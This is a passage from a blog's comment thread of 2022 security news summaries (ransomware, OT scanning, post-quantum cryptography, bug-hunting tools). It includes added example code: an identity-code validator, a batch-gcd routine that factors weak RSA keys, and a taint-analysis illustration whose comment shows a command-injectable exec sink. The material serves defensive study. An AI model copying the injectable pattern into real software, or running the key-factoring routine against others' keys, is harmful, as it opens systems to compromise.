    The agency estimates that the current personal identity codes will suffice for about two more years. New separator characters will ensure that personal identity codes remain sufficient in the future. Personal identity codes already in use will not change. According to the current estimate, new personal identity code separators under the new separator regulation will be issued for the first time in September 2024. The estimate is based on the average issuance volume over 2016–2021, and the Digital and Population Data Services Agency updates the estimate monthly. According to the agency, it is also important for organisations that process personal identity codes to prepare for the change and to ensure that the new kind of personal identity codes work in their information systems.

    Reply
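    The article above tells organisations to verify that the new-format codes work in their systems. The block below is an added example, not from the article or from the agency: a validator for Finnish personal identity codes (DDMMYY, century separator, three-digit individual number, check character) that accepts both the legacy separators and the new ones, next to the legacy-only pattern that rejects new codes outright. The list of new separators (Y, X, W, V, U for the 1900s; B, C, D, E, F for the 2000s) is taken from the 2023 regulation and is stated here as an assumption to verify against the current rules.

```python
# Added example (not from the article or the Digital and Population Data
# Services Agency): validation of Finnish personal identity codes that
# accepts both legacy and new century separators.
import re
from datetime import date

# Century separators. Legacy: '+' (1800s), '-' (1900s), 'A' (2000s).
# Assumption: the 2023 regulation added Y, X, W, V, U for the 1900s and
# B, C, D, E, F for the 2000s. Verify against the current regulation.
CENTURY = {"+": 1800, "-": 1900, "A": 2000}
CENTURY.update({c: 1900 for c in "YXWVU"})
CENTURY.update({c: 2000 for c in "BCDEF"})

# Check character: the nine digits DDMMYY + NNN taken modulo 31 index into
# this alphabet (G, I, O, Q and Z are skipped to avoid confusion with digits).
CHECK_CHARS = "0123456789ABCDEFHJKLMNPRSTUVWXY"

_PATTERN = re.compile(r"^(\d{2})(\d{2})(\d{2})([-+A-FU-Y])(\d{3})([0-9A-Z])$")
# Pattern typical of older systems: only '+', '-' and 'A' are accepted.
_LEGACY_PATTERN = re.compile(r"^\d{6}[-+A]\d{3}[0-9A-Z]$")


def parse_hetu(code: str):
    """Return (date_of_birth, individual_number) or raise ValueError.

    Accepts legacy and new separators and rejects malformed input, impossible
    dates and check-character mismatches.
    """
    m = _PATTERN.match(code.strip().upper())
    if not m:
        raise ValueError("malformed personal identity code")
    dd, mm, yy, sep, nnn, check = m.groups()
    year = CENTURY[sep] + int(yy)
    try:
        dob = date(year, int(mm), int(dd))
    except ValueError as exc:
        raise ValueError("invalid date of birth") from exc
    expected = CHECK_CHARS[int(dd + mm + yy + nnn) % 31]
    if check != expected:
        raise ValueError("check character mismatch")
    individual = int(nnn)
    if individual < 2:
        # 000 and 001 are not issued as individual numbers.
        raise ValueError("individual number 000/001 is not issued")
    return dob, individual


def is_valid_hetu(code: str) -> bool:
    """True when parse_hetu accepts the code, False otherwise."""
    try:
        parse_hetu(code)
        return True
    except ValueError:
        return False


def legacy_accepts(code: str) -> bool:
    """What a legacy-only validator does: new-separator codes are rejected
    even though they are structurally valid."""
    return bool(_LEGACY_PATTERN.match(code.strip().upper()))


if __name__ == "__main__":
    # Constructed sample codes (not real persons): same digits, old vs new separator.
    for sample in ("010190-123M", "010190Y123M", "010124B123L"):
        print(sample, "valid:", is_valid_hetu(sample), "legacy accepts:", legacy_accepts(sample))
```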
  11. Tomi Engdahl says:

    Security Pros Believe Cybersecurity Now Aligned With Cyberwar
    https://www.securityweek.com/security-pros-believe-cybersecurity-now-aligned-cyberwar

    More than three-quarters of security professionals in large organizations believe the world is now in a state of perpetual cyberwar – and 82% consider that geopolitics and cybersecurity are fundamentally linked.

    The figures come from a survey conducted by Sapio for machine identity solutions provider Venafi. The survey hasn’t been published, but the results are discussed in a Venafi blog.

    Sapio surveyed 1,101 security decision makers in firms with more than 1,000 employees (24% had more than 10,000 employees) across the US, UK, France, Germany, the Benelux countries, and Australia. Almost 50% of the individuals surveyed were at C-suite level or above.

    Reply
  12. Tomi Engdahl says:

    Old, Inconspicuous Vulnerabilities Commonly Targeted in OT Scanning Activity
    https://www.securityweek.com/old-inconspicuous-vulnerabilities-commonly-targeted-ot-scanning-activity

    Data collected by IBM shows that old and inconspicuous vulnerabilities affecting industrial products are commonly targeted in scanning activity seen by organizations that use operational technology (OT). SecurityWeek has talked to several experts to find out what this data means and determine the threat posed by these security holes.

    Last week, IBM Security’s X-Force research and intelligence unit published a report describing the OT threat landscape in the first half of 2022. The findings from the report are not surprising: manufacturing continues to be the most targeted industry, phishing remains the main initial infection vector, and spam, RATs and ransomware are the most commonly seen attack types.

    IBM has also looked at vulnerability scanning activity and found that the top two methods, accounting for more than 80% of scanning, are port scanning and Shodan scanning.

    Much of the scanning appeared to be indiscriminate and did not seem to be specifically aimed at organizations with OT environments. However, an analysis of the attack alerts from OT-related industries showed that the most commonly targeted vulnerability was CVE-2016-4510, a flaw in the WAP interface of the Trihedral VTScada SCADA software that allows remote attackers to bypass authentication and read arbitrary files.

    Other vulnerabilities that attackers commonly scan for include CVE-2021-21801, CVE-2021-21802, and CVE-2021-21803, which are cross-site scripting (XSS) issues affecting Advantech’s R-SeeNet router monitoring software, as well as CVE-2018-12634, a credential disclosure flaw affecting Circontrol’s CirCarLife SCADA software for electric vehicle charging stations.

    Reply
  13. Tomi Engdahl says:

    ECF22: No device is completely secure
    https://etn.fi/index.php/72-ecf/13915-ecf22-mikaeaen-laite-ei-ole-taeysin-turvallinen

    Most of us have various gadgets at home that are connected to the home Wi-Fi network and, through it, to the public internet. And if we are like most people, the devices’ security settings have never been touched. These pose a potentially large risk. It does not have to be this way, however.

    This is one of the themes of Embedded Conference Finland, held on 6 September. From the standpoint of security standardisation, IoT devices have been quite a jungle. A remedy is now on the way. The process is slow, but Etteplan’s sales director Antti Tolvanen explains in his ECF22 keynote where standardisation currently stands.

    Over time, standardisation provides a good foundation for device security, but of course it is not enough. In addition, tailored solutions are needed on both the hardware and software side so that the device is secure and does not offer a way into a protected network.

    Reply
  14. Tomi Engdahl says:

    Why is EDR Important to the Security Stack? What are EDR Best Practices? You can learn about it in the newest article on our blog. Check it out!
    #EDR #pentest #magazine #pentest #backdoor #undetectable #cybersecurity #infosecurity #infosec

    Meaning of EDR and Its Importance to the Security Stack in 2022
    https://pentestmag.com/meaning-of-edr-and-its-importance-to-the-security-stack-in-2022/

    What is the Meaning of EDR?
    The term Endpoint Detection and Response (EDR), coined by Anton Chuvakin of Gartner, refers to a security system that uses advanced analytics and automation to:

    Detect suspicious activity on hosts and endpoints like employee workstations, servers, and mobile devices
    Perform automated rule-based threat response directly on the endpoint
    Enable security teams to quickly investigate and respond to threats
    Today EDR is a mature solution provided by most security vendors, as an integrated agent deployed on endpoints. Modern EDR solutions can monitor endpoints, collect activity data that may indicate threats, and analyze this data to identify threat patterns.

    Reply
  15. Tomi Engdahl says:

    Everything You Didn’t Know You Need To Know About Glitching Attacks
    https://hackaday.com/2022/08/25/everything-you-didnt-know-you-need-to-know-about-glitching-attacks/

    If you’ve always been intrigued by the idea of performing hardware attacks but never knew where to start, then we’ve got the article for you: an in-depth look at the hows and whys of hardware glitching.

    Attentive readers will recall that we’ve featured [Matthew Alt]’s reverse engineering exploits before, like the time he got root on a Linux-based arcade cabinet. For something a bit more challenging, he chose a Trezor One crypto wallet this time. We briefly covered a high-stakes hack (third item) on one of these wallets by [Joe Grand] a while back, but [Matthew] offers much, much more detail.

    Replicant: Reproducing a Fault Injection Attack on the Trezor One
    https://voidstarsec.com/blog/replicant-part-1

    Reply
  16. Tomi Engdahl says:

    XIoT Vendors Show Progress on Discovering, Fixing Firmware Vulnerabilities
    https://www.securityweek.com/xiot-vendors-show-progress-discovering-fixing-firmware-vulnerabilities

    Self-disclosures by XIoT vendors have surpassed independent research outfits as the second most prolific vulnerability reporters

    A major impact of the pandemic has been the acceleration of digital transformation, which has expanded from advanced digitization into increasingly unmanaged automation. This automation is largely controlled by unmanaged cyber/physical devices. It started with the first generation of largely consumer oriented IoT devices but has grown into what some now call Industry 5.0.

    The key aspect is no longer simply whether the device has internet connectivity, but whether it performs its functions automatically in an unmanaged fashion. This has become so much wider and more complex than the original concept of IoT or even IIoT. It now includes automatically functioning medical devices, building controls, smart city management, many aspects of OT and industrial control systems, and much more.

    Reply
  17. Tomi Engdahl says:

    Google Open Sources ‘Paranoid’ Crypto Testing Library
    https://www.securityweek.com/google-open-sources-paranoid-crypto-testing-library

    Google has officially announced the open sourcing of ‘Paranoid’, a project for identifying well-known weaknesses in cryptographic artifacts.

    The library includes support for testing multiple crypto artifacts, such as digital signatures, general pseudorandom numbers, and public keys, to identify issues caused by programming errors, or the use of weak proprietary random number generators.

    Paranoid, Google says, can check any artifact, even those generated by systems with unknown implementations – which the company calls ‘black boxes’ – where the source code cannot be inspected.

    “An artifact may be generated by a black-box if, for example, it was not generated by one of our own tools (such as Tink), or by a library that we can inspect and test using Wycheproof. Unfortunately, sometimes we end up relying on black-box generated artifacts,” the internet giant notes.

    Paranoid contains implementations and optimizations extracted from existing crypto-related literature, which “showed that the generation of these artifacts was flawed in some cases,” Google explains.

    https://github.com/google/paranoid_crypto
    https://security.googleblog.com/2022/08/announcing-open-sourcing-of-paranoids.html?m=1

    Reply
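    One of the well-known weaknesses in the literature the article refers to is RSA moduli that share a prime factor, typically caused by a poorly seeded random number generator; any two such keys can be fully factored with one gcd. The block below is an added example, not Paranoid’s own code: a batch-gcd check (Bernstein’s product/remainder tree) that a defender can run over a set of collected public-key moduli to flag the weak ones, with constructed toy moduli in place of real keys.

```python
# Added example (not from the Paranoid project): batch-gcd check for RSA
# moduli that share a prime factor, a well-known weakness of weak RNGs.
from math import gcd


def product_tree(values):
    """Return the levels of a product tree; level 0 is the input list."""
    levels = [list(values)]
    while len(levels[-1]) > 1:
        prev = levels[-1]
        levels.append([prev[i] * (prev[i + 1] if i + 1 < len(prev) else 1)
                       for i in range(0, len(prev), 2)])
    return levels


def batch_gcd(moduli):
    """For each modulus n_i return gcd(n_i, product of all other moduli).

    Uses a product tree and a remainder tree (P mod n_i^2), so it runs in
    quasi-linear time instead of O(k^2) pairwise gcds.
    """
    levels = product_tree(moduli)
    remainders = [levels[-1][0]]            # root: product of all moduli
    for level in reversed(levels[:-1]):
        remainders = [remainders[i // 2] % (n * n) for i, n in enumerate(level)]
    # (P mod n^2) // n == (P / n) mod n, so this equals gcd(P / n, n).
    return [gcd(r // n, n) for r, n in zip(remainders, moduli)]


def find_shared_factors(moduli):
    """Map each weak modulus to the factor pair (p, q) recovered from the set.

    A gcd equal to the modulus itself means it shares both primes with other
    moduli (or is a duplicate); fall back to pairwise gcds to split those.
    """
    weak = {}
    for n, g in zip(moduli, batch_gcd(moduli)):
        if 1 < g < n:
            weak[n] = (g, n // g)
        elif g == n:
            for other in moduli:
                if other != n:
                    h = gcd(n, other)
                    if 1 < h < n:
                        weak[n] = (h, n // h)
                        break
    return weak


if __name__ == "__main__":
    # Constructed toy moduli from small primes (real keys are 2048+ bits):
    # 101*103, 103*107, 109*113, 107*109. Only 109*113 shares nothing with
    # a key that is otherwise unrelated; the rest are recoverable.
    sample = [10403, 11021, 12317, 11663]
    for n, pq in find_shared_factors(sample).items():
        print(f"modulus {n} is weak: factors {pq}")
```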
  18. Tomi Engdahl says:

    How Economic Changes and Crypto’s Rise Are Fueling the use of “Cyber Mules”
    https://www.securityweek.com/how-economic-changes-and-cryptos-rise-are-fueling-use-cyber-mules

    The rise of cryptocurrency has ushered in a new era of money laundering

    As fears over recession loom in many places globally, both cybercrime and job insecurity are on the rise. Meanwhile, some layoffs have occurred and the conversations at work around working-from-anywhere or back to the office continue. And if history tells us anything, it’s that this type of environment is ripe for the increased use of “cyber mules” – aka the cybercrime world’s money mules. In fact, FortiGuard Labs researchers have seen almost 100% growth in new ransomware variants in 2022 so far compared to the prior six months.

    Reply
  19. Tomi Engdahl says:

    Ransomware Attacks are on the Rise
    https://threatpost.com/ransomware-attacks-are-on-the-rise/180481/
    Lockbit is by far this summer’s most prolific ransomware group, trailed by two offshoots of the Conti group. With data gathered by “actively monitoring the leak sites used by each ransomware group and scraping victim details as they are released,” researchers have determined that Lockbit was by far the most prolific ransomware gang in July, behind 62 attacks. That’s ten more than the month prior, and more than twice as many as the second and third most prolific groups combined. “Lockbit 3.0 maintain their foothold as the most threatening ransomware group,” the authors wrote, “and one with which all organizations should aim to be aware of.” Those second and third most prolific groups are Hiveleaks (27 attacks) and BlackBasta (24 attacks).
    These figures represent rapid rises for each group since June, a 440 percent rise for Hiveleaks, and a 50 percent rise for BlackBasta. It may well be that the resurgence in ransomware attacks, and the rise of these two particular groups, are intimately connected.

    Reply
  20. Tomi Engdahl says:

    Preparing Critical Infrastructure for Post-Quantum Cryptography https://www.cisa.gov/uscert/ncas/current-activity/2022/08/24/preparing-critical-infrastructure-post-quantum-cryptography
    CISA has released CISA Insights: Preparing Critical Infrastructure for Post-Quantum Cryptography, which outlines the actions that critical infrastructure stakeholders should take now to prepare for their future migration to the post-quantum cryptographic standard that the National Institute of Standards and Technology (NIST) will publish in 2024. CISA strongly urges critical infrastructure stakeholders to follow the recommendations in the Insights now to ensure a smooth migration to the post-quantum cryptography standard.
    File: https://www.cisa.gov/sites/default/files/publications/cisa_insight_post_quantum_cryptography_508.pdf

    Reply
  21. Tomi Engdahl says:

    FCC launches investigation into mobile carriers’ geolocation data practices https://therecord.media/fcc-launches-investigation-into-mobile-carriers-geolocation-data-practices/
    The Federal Communication Commission on Thursday shared responses from mobile carriers to a probe of how they handle geolocation data and announced a new investigation into carrier compliance with agency rules about disclosing how such data is stored and shared.

    Reply
  22. Tomi Engdahl says:

    The number of companies caught up in recent hacks keeps growing https://arstechnica.com/information-technology/2022/08/the-number-of-companies-caught-up-in-the-twilio-hack-keeps-growing/
    In recent weeks, security provider Twilio revealed it was breached by well-resourced phishers, who used their access to steal data from 163 of its customers. Security firm Group-IB, meanwhile, said that the same phishers who hit Twilio breached at least 136 companies in similar advanced attacks. Three companies — Twilio-owned Authy, password manager LastPass, and food delivery network DoorDash — have in recent days all disclosed data breaches that appear to be related to the same activity. Authentication service Okta and secure messenger provider Signal both recently said their data was accessed as a result of the Twilio breach.

    Reply
  23. Tomi Engdahl says:

    Exposing a Compilation of Known Ransomware Group’s Dark Web Onion Web Sites – An OSINT Analysis https://ddanchev.blogspot.com/2022/08/exposing-compilation-of-known.html
    I’ve decided to share with everyone some of the findings from some of my latest Dark Web research with the idea to improve your situational awareness in the world of growing and emerging cyber threats including ransomware releases on the infamous Dark Web. In this post I’ll provide a currently active list of Dark Web Onion web sites that exclusively belong to various ransomware groups with the idea to assist everyone on their way to improve their situational awareness in the world of fighting and responding including to monitor and track down various ransomware campaigns globally.

    Reply
  24. Tomi Engdahl says:

    Eight-Year Study Shows the Dark Side of WordPress Plugins https://www.cc.gatech.edu/news/eight-year-study-shows-dark-side-wordpress-plugins
    Since 2012 researchers in the Georgia Tech Cyber Forensics Innovation Laboratory (CyFI Lab) have uncovered 47,337 malicious plugins across 24,931 unique WordPress websites through a web development tool they named YODA. According to a newly released paper about the eight-year study, the researchers found that every compromised website in their dataset had two or more infected plugins. The findings also indicated that 94% of those plugins are still actively infected.

    Reply
  25. Tomi Engdahl says:

    Virve leaps from radio telephone to smartphone: this is the vital public authority network that carries 74 million messages a week https://yle.fi/uutiset/3-12593038?origin=rss
    The roughly twenty-year-old Virve network has sweeping prospects ahead of it, as traditional narrowband radio telephone traffic changes into a broadband network that uses the 4G and 5G mobile networks. In the new public authority network, images and video can be transmitted in addition to speech.
    Virve is used by the rescue services, social and health services, the police, the Defence Forces, the railways, the emergency response centre and numerous other security actors, such as Yleisradio. In the Virve network, calls and group calls are carried securely and simultaneously even to a large group.
    The old system will operate alongside the new one at least until the end of 2025.

    Reply
  26. Tomi Engdahl says:

    Facebook Parent Settles Suit in Cambridge Analytica Scandal
    https://www.securityweek.com/facebook-parent-settles-suit-cambridge-analytica-scandal

    Facebook’s corporate parent has reached a tentative settlement in a lawsuit alleging the world’s largest social network service allowed millions of its users’ personal information to be fed to Cambridge Analytica, a firm that supported Donald Trump’s victorious presidential campaign in 2016.

    Terms of the settlement reached by Meta Platforms, the holding company for Facebook and Instagram, weren’t disclosed in court documents filed late Friday. The filing in San Francisco federal court requested a 60-day stay of the action while lawyers finalize the settlement. That timeline suggested further details could be disclosed by late October.

    The accord was reached just a few weeks before a Sept. 20 deadline for Meta CEO Mark Zuckerberg and his long-time chief operating officer, Sheryl Sandberg, to submit to depositions during the final phases of pre-trial evidence gathering, according to court documents.

    Zuckerberg, who founded Facebook in 2004 as a Harvard University student, could have been deposed for up to six hours. Sandberg, who is stepping down as chief operating officer after a 14-year stint, could have been questioned for up to five hours.

    Reply
  27. Tomi Engdahl says:

    CISA Urges Critical Infrastructure to Prepare for Post-Quantum Cryptography
    https://www.securityweek.com/cisa-urges-critical-infrastructure-prepare-post-quantum-cryptography

    The US Cybersecurity and Infrastructure Security Agency (CISA) has outlined the steps that critical infrastructure organizations should take to prepare for the migration to the new post-quantum cryptographic standard.

    The National Institute of Standards and Technology (NIST) is expected to publish the standard in 2024, but CISA urges stakeholders to prepare in advance, citing potential risks from quantum computing to the entire critical infrastructure.

    Quantum computers use qubits, or ‘quantum bits’, to deliver higher computing power and speed in certain scenarios, including solving mathematical problems that the current encryption standards rely on.

    As such, quantum computing is expected to become a threat to current cryptographic standards, which support network security and also ensure data confidentiality and integrity.

    “In the hands of adversaries, sophisticated quantum computers could threaten U.S. national security if we do not begin to prepare now for the new post-quantum cryptographic standard,” CISA says.

    Reply
  28. Tomi Engdahl says:

    Crypto Firms Say US Sanctions Limit Use of Privacy Software
    https://www.securityweek.com/crypto-firms-say-us-sanctions-limit-use-privacy-software

    The Treasury Department is facing pushback from the cryptocurrency industry over sanctions imposed on a firm accused of helping to launder billions of dollars — with some funds going to North Korean hackers.

    Earlier this month, the Treasury Department imposed sanctions on the virtual currency mixing firm, Tornado Cash, which allegedly helped to launder more than $7 billion worth of virtual currency since its creation in 2019.

    Mixing services combine various digital assets, including potentially illegally and legitimately obtained funds, to keep the origins of the funds secret, including money that has been stolen.

    In the weeks after the sanctions were announced, crypto firms, lobbyists and at least one lawmaker have come to the firm’s defense, saying the sanctions open the door to limiting Americans’ usage of privacy software.

    Coin Center, a nonprofit crypto advocacy firm, says Treasury’s financial crimes enforcement arm “overstepped its legal authority” through its sanctions, which “potentially violates constitutional rights to due process and free speech.”

    Reply
  29. Tomi Engdahl says:

    Uh, so Samsung asked customer to DRILL through SSD before returning it
    Samsung Germany asked a customer to physically destroy his Samsung 980 PRO SSD by smashing it with a hammer, or drilling it, before returning it for RMA.

    Read more: https://www.tweaktown.com/news/88140/uh-so-samsung-asked-customer-to-drill-through-ssd-before-returning-it/index.html

    Reply
  30. Tomi Engdahl says:

    Tor 101: How Tor Works and its Risks to the Enterprise https://unit42.paloaltonetworks.com/tor-traffic-enterprise-networks/
    The Tor project provides one of the most well-known tools that users can leverage to stay anonymous on the internet. People use Tor for many different reasons, both benign and malicious.

    Reply
  31. Tomi Engdahl says:

    CISA: Prepare now for quantum computers, not when hackers use them https://www.bleepingcomputer.com/news/security/cisa-prepare-now-for-quantum-computers-not-when-hackers-use-them/
    Although quantum computing is not commercially available, CISA (Cybersecurity and Infrastructure Security Agency) urges organizations to prepare for the dawn of this new age, which is expected to bring groundbreaking changes in cryptography, and how we protect our secrets.

    Reply
  32. Tomi Engdahl says:

    Galois Open Sources Tools for Finding Vulnerabilities in C, C++ Code
    https://www.securityweek.com/galois-open-sources-tools-finding-vulnerabilities-c-c-code

    Galois, a firm specialized in the research and development of new technologies, has open sourced a suite of tools for identifying vulnerabilities in C and C++ code.

    Dubbed MATE, the tools are the result of a collaborative effort supported by the United States Air Force and Defense Advanced Research Project Agency (DARPA).

    Now available under the BSD 3-clause license, MATE relies on code property graphs (CPGs) for static program analysis, and can identify application-specific bugs that depend on implementation details and high-level semantics.

    The CPG includes a target’s abstract syntax tree (AST), call graph (CG), control-flow graph (CFG), inter-procedural control-flow graph (ICFG), inter-procedural dataflow-graph (DFG), control-dependence graph (CDG), memory layout and DWARF type graph, points-to graph (PTG), and source-code to machine-code mapping.

    The suite includes several applications built on top of the foundation of the CPG, including Flowfinder, MATE Notebooks, MATE POIs, and Mantiserve.

    Flowfinder provides a browser-based user interface that helps in exploring a program’s code property graph, for interprocedural analysis of dataflows. It supports expanding and contracting semantic representations of code and data, as well as creating and manipulating visualizations of flows between components.

    Reply
  33. Tomi Engdahl says:

    MATE: Merged Analysis To prevent Exploits
    https://galoisinc.github.io/MATE/

    MATE is a suite of tools for interactive program analysis with a focus on hunting for bugs in C and C++ code. MATE unifies application-specific and low-level vulnerability analysis using code property graphs (CPGs), enabling the discovery of highly application-specific vulnerabilities that depend on both implementation details and the high-level semantics of target C/C++ programs.

    Reply
  34. Tomi Engdahl says:

    Ryan Broderick / Garbage Day:
    Social media “war rooms” that are set up to fight misinformation and reported on by the media ahead of the US midterms are nothing more than theater

    The Election War Room Scam
    https://www.garbageday.email/p/bracing-for-impact?triedSigningIn=true

    We’re less than three months away from the US midterms, which means we are officially in the “Here’s what this tech company is doing to battle misinformation” news cycle. So, let’s see how it’s going, shall we? Twitter says it’s focusing on “elevating reliable resources”. Facebook is going to be using “false content” warning labels and restricting political ad purchases in the week before the election. And TikTok is really pulling out all the stops.

    TikTok published a blog post laughably titled, “Our commitment to election integrity,” earlier this month. What’s the commitment? A register to vote widget! An “Elections Center” hub inside the app! Revolutionary stuff. Partnerships with fact-checking organizations! You love to see it. TikTok also says it will block paid political content, which, you know, ignoring the existence of dark money, is a good step, I suppose.

    I want to ask something of an uncomfortable question. Why does misinformation and disinformation suddenly matter during an election? It’s a question that’s been on my mind for years.

    And, while I think what we do online impacts how we see the world and, thus, affects how our democracies function, it feels as if both the media and the companies that run these platforms have turned misinformation and disinformation into a weird live event focused on the idea that if voters see too many bad posts in the week leading up to a big vote, democracy is doomed. Never mind all the bad posts they see every other day of the year.

    I remember the hilariously dumb “war room” that Facebook set up for Brazil’s 2018 election, complete with little Brazilian flags on computers. I imagine it was similar to what I saw in Italy, which was a bunch of screens with live CrowdTangle dashboards, basically. Only, in 2018, Facebook’s “war room” did not stop misinformation about Brazil’s election from spreading via the platform’s very own ad library. Also, the biggest source of election misinformation in Brazil was WhatsApp.

    When platforms set up these “war rooms” and get news organizations to report on these stunts as if they matter, they’re able to create this mental picture of a company proactively safeguarding their platform to uphold democracy. They want you to imagine Mark Zuckerberg standing in a command center bracing for impact as a Macedonian high school computer lab deploys a wave of Pepe the Frog memes in the replies to an unsuspecting CNN anchor’s tweet.

    It’s all theater and it’s meant to obscure the fact that misinformation and disinformation are integral parts of using a user-generated content platform with a sharing functionality. I mean, really seriously, just stop for a second and think about how you would even solve this problem. There are obviously notable differences between how Twitter and 4chan are moderated, but misinformation and disinformation are inseparable parts of both.

    Mark Scott, the chief technology correspondent for Politico, had a great series of tweets about this earlier this month. “If your strategy is to rely on fact-checkers for content moderation and/or election integrity on social media, you might as well just give up and go home,” he wrote. “This is not to knock the work of all of fact-checking groups out there. It is a noble aim: to debunk falsehoods. But they are understaffed, under-resourced and, increasingly, faced financial pressures to pump out as many fact-checks as possible vs making a notable difference.”

    Alright, so, you’re probably saying, “ok, tough guy, well, what do we do if we can’t rely on fact-checkers?” Well, honestly, media blackouts are a possible model. America obviously doesn’t have them, but many countries have specific rules about how mass media can report on an election in the pivotal hours leading up to it. I think it’s interesting that these platforms spend a huge amount of resources on their little widgets and hubs and tabs and labels, but none of them are “committed to democracy” enough to just pull the plug on themselves for two days. We had elections before social media. It, arguably, went a lot better tbh.

    Reply
  35. Tomi Engdahl says:

    77% Of Security Leaders Fear We’re In Perpetual Cyberwar From Now On
    https://blog.deurainfosec.com/77-of-security-leaders-fear-were-in-perpetual-cyberwar-from-now-on/

    A survey of cybersecurity decision makers found 77 percent think the world is now in a perpetual state of cyberwarfare.

    In addition, 82 percent believe geopolitics and cybersecurity are “intrinsically linked,” and two-thirds of polled organizations reported changing their security posture in response to the Russian invasion of Ukraine.

    Of those asked, 64 percent believe they may have already been the target of a nation-state-directed cyberattack.

    Reply
  36. Tomi Engdahl says:

    I Tried the Privacy Phone Network Intended to Mask Your Identity
    Pretty Good Phone Privacy, or PGPP, is a novel new system that attempts to separate your phone usage from your identity.
    https://www.vice.com/en/article/n7z7wb/how-to-change-my-imsi-privacy-phone-pgpp-invisv

    Reply
  37. Tomi Engdahl says:

    Announcing Google’s Open Source Software Vulnerability Rewards Program https://security.googleblog.com/2023/08/Announcing-Googles-Open-Source-Software-Vulnerability-Rewards-Program%20.html
    Today, we are launching Google’s Open Source Software Vulnerability Rewards Program (OSS VRP) to reward discoveries of vulnerabilities in Google’s open source projects. As the maintainer of major projects such as Golang, Angular, and Fuchsia, Google is among the largest contributors and users of open source in the world.

    Reply
  38. Tomi Engdahl says:

    Cyber Signals: 3 strategies for protection against ransomware https://www.microsoft.com/security/blog/2022/08/30/cyber-signals-3-strategies-for-protection-against-ransomware/
    The “as a service” business model has gained widespread popularity as growing cloud adoption has made it possible for people to access important services through third-party providers. Given the convenience and agility of service offerings, perhaps it shouldn’t be surprising that the “as a service” model is being used by cybercriminals for nefarious purposes.

    Reply
  39. Tomi Engdahl says:

    The security benefits of modern collaboration in the cloud https://www.ncsc.gov.uk/blog-post/the-security-benefits-of-modern-collaboration-in-the-cloud
    When using cloud services, it is important to balance the need to ‘open up’ access to information (to allow collaboration) with the need to ‘lock down’ to protect sensitive information.

    Reply
  40. Tomi Engdahl says:

    How and Why Do Teens Become Cyber Criminals?
    https://securityintelligence.com/articles/why-teens-become-cyber-criminals/
    The search to find the mastermind of the attacker group Lapsus$ led to a home outside Oxford, England. The suspected leader was a 16-year-old. He helped take down some of the world’s biggest companies, including Microsoft, from his mother’s house.

    Reply
  41. Tomi Engdahl says:

    FBI Warns Investors to Take Precautions with Decentralized Financial Platforms https://thehackernews.com/2022/08/fbi-warns-investors-to-take-precautions.html
    The U.S. Federal Bureau of Investigation (FBI) on Monday warned of cyber criminals increasingly exploiting flaws in decentralized finance (DeFi) platforms to plunder cryptocurrency.

    Reply
  42. Tomi Engdahl says:

    Academics Devise Open Source Tool For Hunting Node.js Security Flaws
    https://www.securityweek.com/academics-devise-open-source-tool-hunting-nodejs-security-flaws

    A group of academic researchers have designed an open source Node.js bug hunting tool that has already identified 180 security vulnerabilities.

    Node.js is an open-source, cross-platform, environment for running JavaScript code outside the browser. It was designed for the development of network applications. While useful, many of the available Node.js packages contain unknown flaws leading to application compromise.

    Now, academics from the Johns Hopkins University and Renmin University of China propose a new approach to finding security vulnerabilities in Node.js packages.

    Inspired by the graph query-based approaches such as Code Property Graph (CPG), the researchers devised a novel graph structure called Object Dependence Graph (ODG), and also built an open-source prototype system called ‘ODGEN’, to use ODG for bug hunting.

    ODG models JavaScript objects as nodes and represents their relations with Abstract Syntax Tree (AST) as edges.

    “Specifically, ODG includes fine-grained data dependencies between objects, thus helping taint-style vulnerability detection such as command injection,” according to a research paper (.pdf) documenting the work.

    The new approach generates ODG using “flow- and context-sensitive static analysis with hybrid branch-sensitivity and points-to information”, the group said, noting that ODG can be used for the offline detection of various types of Node.js vulnerabilities.

    Mining Node.js Vulnerabilities via Object Dependence Graph and Query
    https://www.usenix.org/system/files/sec22summer_li-song.pdf

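To make the graph-query idea in the ODGEN summary above concrete, here is an added toy example (not ODGEN's code, and far coarser than its real Object Dependence Graph): a hand-built dependence graph for a constructed Node.js handler, with a source, a hypothetical sanitizer `escapeArg`, and two `child_process.exec` sinks, and a query that reports which sinks receive unsanitized data.

```javascript
// Added illustration, not ODGEN's code or its real graph format: a tiny
// object-dependence graph for this constructed Node.js handler:
//   const name = req.query.name;        // attacker-controlled source
//   const safe = escapeArg(name);       // hypothetical sanitizer
//   child_process.exec("ls " + name);   // sink fed raw input
//   child_process.exec("ls " + safe);   // sink fed sanitized input
// Nodes are JavaScript objects; edge [from, to] means `to` is derived from `from`.
const graph = {
  nodes: {
    "req.query.name": { source: true },
    "name": {},
    "safe": { sanitizer: "escapeArg" },
    "cmd1": {}, // "ls " + name
    "cmd2": {}, // "ls " + safe
    "exec#1": { sink: "child_process.exec" },
    "exec#2": { sink: "child_process.exec" },
  },
  edges: [
    ["req.query.name", "name"],
    ["name", "safe"],
    ["name", "cmd1"],
    ["safe", "cmd2"],
    ["cmd1", "exec#1"],
    ["cmd2", "exec#2"],
  ],
};

// Query: which sinks are reachable from a source along data-dependence edges
// without passing through a sanitizer node? Returns sorted sink ids.
function findTaintedSinks(g) {
  const succ = new Map();
  for (const [from, to] of g.edges) {
    if (!succ.has(from)) succ.set(from, []);
    succ.get(from).push(to);
  }
  const tainted = new Set();
  const visited = new Set();
  const stack = Object.keys(g.nodes).filter((n) => g.nodes[n].source);
  while (stack.length > 0) {
    const n = stack.pop();
    if (visited.has(n)) continue;
    visited.add(n);
    const info = g.nodes[n];
    if (info.sanitizer) continue; // taint does not propagate past a sanitizer
    if (info.sink) tainted.add(n);
    for (const m of succ.get(n) || []) stack.push(m);
  }
  return [...tainted].sort();
}
```

On the constructed graph the query flags only `exec#1`, the sink fed by the raw query parameter; the real ODG adds much finer-grained dependencies and context sensitivity, which is what lets ODGEN scale this style of query to whole packages.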
  43. Tomi Engdahl says:

    Pwn2Own Offers $100,000 for Home Office Hacking Scenario
    https://www.securityweek.com/pwn2own-offers-100000-home-office-hacking-scenario

    Trend Micro’s Zero Day Initiative (ZDI) has announced the targets and prizes for its next Pwn2Own hacking competition, as well as the introduction of a new category that aims to simulate a real world home office environment.

    The next Pwn2Own will take place December 6-8, 2022, at ZDI’s office in Toronto, Canada. The registration deadline is December 2. The event will not take place alongside a conference so ZDI has decided to reimburse $3,000 for travel expenses to encourage hackers to participate in person. Bug bounty hunters can also compete remotely, with a ZDI employee in Toronto running the exploit for them.

    The organizer is offering a total of more than $1 million in cash and prizes for exploits targeting mobile phones, wireless routers, home automation hubs, smart speakers, printers and NAS devices.

